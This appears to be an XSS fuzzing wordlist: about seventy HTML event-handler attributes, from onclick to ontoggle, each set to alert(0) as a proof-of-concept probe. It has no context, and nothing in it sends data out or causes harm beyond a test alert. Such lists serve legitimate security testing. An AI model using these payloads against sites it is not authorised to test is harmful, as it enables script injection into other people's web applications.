onclick="alert(0)"
ondblclick="alert(0)"
onmousedown="alert(0)"
onmouseup="alert(0)"
onmouseover="alert(0)"
onmousemove="alert(0)"
onmouseout="alert(0)"
onmouseenter="alert(0)"
onmouseleave="alert(0)"
oncontextmenu="alert(0)"
onkeydown="alert(0)"
onkeyup="alert(0)"
onkeypress="alert(0)"
onfocus="alert(0)"
onblur="alert(0)"
onchange="alert(0)"
oninput="alert(0)"
onsubmit="alert(0)"
onreset="alert(0)"
onselect="alert(0)"
oninvalid="alert(0)"
onload="alert(0)"
onunload="alert(0)"
onresize="alert(0)"
onscroll="alert(0)"
onwheel="alert(0)"
onplay="alert(0)"
onpause="alert(0)"
onplaying="alert(0)"
oncanplay="alert(0)"
oncanplaythrough="alert(0)"
ondurationchange="alert(0)"
onemptied="alert(0)"
onended="alert(0)"
onloadeddata="alert(0)"
onloadedmetadata="alert(0)"
onloadstart="alert(0)"
onratechange="alert(0)"
onseeked="alert(0)"
onseeking="alert(0)"
onstalled="alert(0)"
onsuspend="alert(0)"
ontimeupdate="alert(0)"
onvolumechange="alert(0)"
onwaiting="alert(0)"
ondrag="alert(0)"
ondragend="alert(0)"
ondragenter="alert(0)"
ondragleave="alert(0)"
ondragover="alert(0)"
ondragstart="alert(0)"
ondrop="alert(0)"
oncopy="alert(0)"
oncut="alert(0)"
onpaste="alert(0)"
onabort="alert(0)"
onbeforeunload="alert(0)"
onerror="alert(0)"
onhashchange="alert(0)"
onmessage="alert(0)"
onoffline="alert(0)"
ononline="alert(0)"
onpopstate="alert(0)"
onstorage="alert(0)"
onpageshow="alert(0)"
onpagehide="alert(0)"
onanimationstart="alert(0)"
onanimationend="alert(0)"
onanimationiteration="alert(0)"
ontransitionend="alert(0)"
ontoggle="alert(0)"
